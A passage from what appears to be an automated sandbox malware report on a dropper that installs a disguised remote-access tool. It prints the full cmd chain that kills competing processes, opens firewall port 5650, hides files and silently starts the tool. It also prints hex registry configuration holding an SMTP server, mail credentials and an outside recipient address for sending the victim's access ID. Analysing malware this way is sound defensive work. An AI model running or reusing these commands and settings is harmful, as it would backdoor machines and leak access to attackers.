f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a	install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a	install.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4464	PING.EXE

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
4632	setup.tmp
4632	setup.tmp
1120	svchîst.exe
1120	svchîst.exe
1120	svchîst.exe
1120	svchîst.exe
1120	svchîst.exe
1120	svchîst.exe
1120	svchîst.exe
1120	svchîst.exe
1120	svchîst.exe
1120	svchîst.exe
3052	svchîst.exe
3052	svchîst.exe
3052	svchîst.exe
3052	svchîst.exe
3052	svchîst.exe
3052	svchîst.exe
1932	svchîst.exe
1932	svchîst.exe
1932	svchîst.exe
1932	svchîst.exe
1932	svchîst.exe
1932	svchîst.exe
4208	svchîst.exe
4208	svchîst.exe
4208	svchîst.exe
4208	svchîst.exe
4208	svchîst.exe
4208	svchîst.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	5008	taskkill.exe
Token: SeDebugPrivilege	4876	taskkill.exe
Token: SeDebugPrivilege	1120	svchîst.exe
Token: SeDebugPrivilege	2408	WiseDiskCleaner.exe
Token: SeBackupPrivilege	2408	WiseDiskCleaner.exe
Token: SeRestorePrivilege	2408	WiseDiskCleaner.exe
Token: SeDebugPrivilege	1932	svchîst.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4632	setup.tmp

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
1120	svchîst.exe
1120	svchîst.exe
1120	svchîst.exe
1120	svchîst.exe
3052	svchîst.exe
3052	svchîst.exe
3052	svchîst.exe
3052	svchîst.exe
2408	WiseDiskCleaner.exe
2408	WiseDiskCleaner.exe
1932	svchîst.exe
1932	svchîst.exe
1932	svchîst.exe
1932	svchîst.exe
4208	svchîst.exe
4208	svchîst.exe
4208	svchîst.exe
4208	svchîst.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4340 wrote to memory of 1800	4340	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe	77
PID 4340 wrote to memory of 1800	4340	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe	77
PID 4340 wrote to memory of 1800	4340	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe	77
PID 4340 wrote to memory of 528	4340	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe	78
PID 4340 wrote to memory of 528	4340	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe	78
PID 4340 wrote to memory of 528	4340	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe	78
PID 1800 wrote to memory of 5008	1800	cmd.exe	81
PID 1800 wrote to memory of 5008	1800	cmd.exe	81
PID 1800 wrote to memory of 5008	1800	cmd.exe	81
PID 528 wrote to memory of 544	528	cmd.exe	82
PID 528 wrote to memory of 544	528	cmd.exe	82
PID 528 wrote to memory of 544	528	cmd.exe	82
PID 528 wrote to memory of 1196	528	cmd.exe	83
PID 528 wrote to memory of 1196	528	cmd.exe	83
PID 528 wrote to memory of 1196	528	cmd.exe	83
PID 4340 wrote to memory of 876	4340	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe	84
PID 4340 wrote to memory of 876	4340	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe	84
PID 4340 wrote to memory of 876	4340	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe	84
PID 1800 wrote to memory of 4876	1800	cmd.exe	87
PID 1800 wrote to memory of 4876	1800	cmd.exe	87
PID 1800 wrote to memory of 4876	1800	cmd.exe	87
PID 1800 wrote to memory of 4576	1800	cmd.exe	88
PID 1800 wrote to memory of 4576	1800	cmd.exe	88
PID 1800 wrote to memory of 4576	1800	cmd.exe	88
PID 1800 wrote to memory of 4592	1800	cmd.exe	89
PID 1800 wrote to memory of 4592	1800	cmd.exe	89
PID 1800 wrote to memory of 4592	1800	cmd.exe	89
PID 876 wrote to memory of 4632	876	setup.exe	90
PID 876 wrote to memory of 4632	876	setup.exe	90
PID 876 wrote to memory of 4632	876	setup.exe	90
PID 1800 wrote to memory of 4252	1800	cmd.exe	91
PID 1800 wrote to memory of 4252	1800	cmd.exe	91
PID 1800 wrote to memory of 4252	1800	cmd.exe	91
PID 1800 wrote to memory of 1372	1800	cmd.exe	92
PID 1800 wrote to memory of 1372	1800	cmd.exe	92
PID 1800 wrote to memory of 1372	1800	cmd.exe	92
PID 1372 wrote to memory of 1492	1372	install.exe	93
PID 1372 wrote to memory of 1492	1372	install.exe	93
PID 1372 wrote to memory of 1492	1372	install.exe	93
PID 1372 wrote to memory of 1712	1372	install.exe	95
PID 1372 wrote to memory of 1712	1372	install.exe	95
PID 1372 wrote to memory of 1712	1372	install.exe	95
PID 1372 wrote to memory of 2988	1372	install.exe	97
PID 1372 wrote to memory of 2988	1372	install.exe	97
PID 1372 wrote to memory of 2988	1372	install.exe	97
PID 1372 wrote to memory of 116	1372	install.exe	100
PID 1372 wrote to memory of 116	1372	install.exe	100
PID 1372 wrote to memory of 116	1372	install.exe	100
PID 4632 wrote to memory of 4516	4632	setup.tmp	102
PID 4632 wrote to memory of 4516	4632	setup.tmp	102
PID 4632 wrote to memory of 4516	4632	setup.tmp	102
PID 1492 wrote to memory of 2508	1492	cmd.exe	103
PID 1492 wrote to memory of 2508	1492	cmd.exe	103
PID 1492 wrote to memory of 2508	1492	cmd.exe	103
PID 2988 wrote to memory of 4636	2988	cmd.exe	105
PID 2988 wrote to memory of 4636	2988	cmd.exe	105
PID 2988 wrote to memory of 4636	2988	cmd.exe	105
PID 116 wrote to memory of 4740	116	cmd.exe	106
PID 116 wrote to memory of 4740	116	cmd.exe	106
PID 116 wrote to memory of 4740	116	cmd.exe	106
PID 1712 wrote to memory of 2040	1712	cmd.exe	107
PID 1712 wrote to memory of 2040	1712	cmd.exe	107
PID 1712 wrote to memory of 2040	1712	cmd.exe	107
PID 1800 wrote to memory of 4464	1800	cmd.exe	108

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3564	attrib.exe
544	attrib.exe
1196	attrib.exe
540	attrib.exe
4584	attrib.exe

C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe
"C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe"
1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4340
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
  2⤵
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:1800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rutserv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rfusclient.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4876
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening TCP 5650 "Open Port 5650"
    3⤵
    PID:4592
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\drivers\install.exe
    "C:\Windows\System32\drivers\install.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1492
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
        5⤵
        Modifies registry class
        
        PID:2508
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1712
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c63757